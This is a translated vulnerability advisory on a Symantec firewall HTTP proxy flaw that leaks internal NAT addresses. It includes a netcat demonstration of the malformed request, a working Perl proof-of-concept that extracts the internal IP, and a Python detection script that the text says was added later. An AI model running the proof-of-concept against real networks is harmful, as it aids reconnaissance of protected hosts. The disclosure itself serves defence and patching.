Security Vulnerability
Symantec Enterprise Firewall/Gateway Security HTTP Proxy Internal IP Disclosure Vulnerability

Published: 2006-05-10
Updated: 2006-05-12

Affected systems:
Symantec Enterprise Firewall 8.0
Symantec Gateway Security 5000 Series 3.0
Symantec Gateway Security 5000 Series 2.0.1
Description:
BUGTRAQ  ID: 17936

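Symantec Enterprise Firewall and Gateway Security are both popular firewall systems.

An information disclosure vulnerability exists in the HTTP proxy of the Symantec Enterprise Firewall and Symantec Gateway Security products. A remote attacker may exploit it to obtain IP address information from inside the local network.

In response to a specially crafted HTTP request, "get/XX HTTP/1.0" (note the missing space),

the firewall forwards the request and waits for the web server's reply until it times out. The firewall's final response resembles: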

df0rm@b4byl0n:~> netcat www.behind-raptor.com 80
get/01 http/1.0
HTTP/1.1 504 Gateway Timeout
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Tue, 13 Sep 2005 06:23:32 GMT
Connection: close
Content-Type: text/html

[...]

The request as seen by the firewall is:

<tt><ul><li>
         http://10.238.94.57/01

In this way the firewall discloses the internal address that NAT is supposed to hide.
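A defensive check for the behaviour described above, as an added example that is not part of the original advisory: it scans captured request/response pairs (for instance from a regression test against a patched gateway) for responses that expose an RFC 1918 address as a URL host, and records whether the triggering request line was malformed. The function names and the tuple layout of the captured exchanges are assumptions made for this example.

```python
import ipaddress
import re

# RFC 1918 ranges that NAT is expected to keep hidden from outside clients.
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Well-formed request line: METHOD SP request-target SP HTTP-version.
REQUEST_LINE = re.compile(r"^[A-Za-z]+ \S+ HTTP/\d\.\d$", re.IGNORECASE)
URL_HOST = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")


def is_malformed_request_line(line):
    """True when the line lacks the 'METHOD SP target SP version' shape."""
    return REQUEST_LINE.match(line.strip()) is None


def leaked_private_addresses(response_text):
    """Return RFC 1918 addresses that appear as URL hosts in a response."""
    leaked = []
    for candidate in URL_HOST.findall(response_text):
        try:
            addr = ipaddress.ip_address(candidate)
        except ValueError:  # e.g. 999.1.1.1 matches the regex but is not an IP
            continue
        if any(addr in net for net in PRIVATE_NETS) and candidate not in leaked:
            leaked.append(candidate)
    return leaked


def audit(exchanges):
    """List (request line, malformed?, leaked addresses) for every leaking reply."""
    findings = []
    for request_line, response_text in exchanges:
        leaked = leaked_private_addresses(response_text)
        if leaked:
            findings.append((request_line, is_malformed_request_line(request_line), leaked))
    return findings


# Exchange quoted in the advisory, then a constructed well-formed request for contrast.
SAMPLE_EXCHANGES = [
    ("get/01 http/1.0",
     "HTTP/1.1 504 Gateway Timeout\r\nConnection: close\r\n\r\n"
     "<tt><ul><li>\nhttp://10.238.94.57/01\n"),
    ("GET /index.html HTTP/1.0",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>ok</html>"),
]

if __name__ == "__main__":
    for request_line, malformed, leaked in audit(SAMPLE_EXCHANGES):
        print(f"request {request_line!r} (malformed={malformed}) exposed {leaked}")
```

After the vendor update is applied, the same audit over fresh captures should return an empty list.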

<*Source: Bernhard Mueller (research@sec-consult.com)

  Links: http://marc.theaimsgroup.com/?l=bugtraq&m=114747623125993&w=2
        http://securityresponse.symantec.com/avcenter/security/Content/2006.05.10.html
*>

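Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!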

#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot} com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use IO::Socket;

$| = 1;

$host = $ARGV[0] or die "$0 <host>\n";

$request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
                 PeerAddr => $host,
                 PeerPort => 80,
                 Proto => 'tcp',
);

die "could not open socket: $!\n" unless $sock;

print $sock $request;

print "waiting for timeout (this can take about 1 min.)\n";

while (<$sock>) {
                 if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
                                 $ip = $1;
                 }
}

if (defined($ip)) {
                 print "$host: $ip\n";
} else {
                 print "failed.\n";
}

close($sock);

Recommendation:
Vendor patch:

Symantec
--------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:

http://www.symantec.com/techsupp/enterprise/select_product_updates.html

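This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.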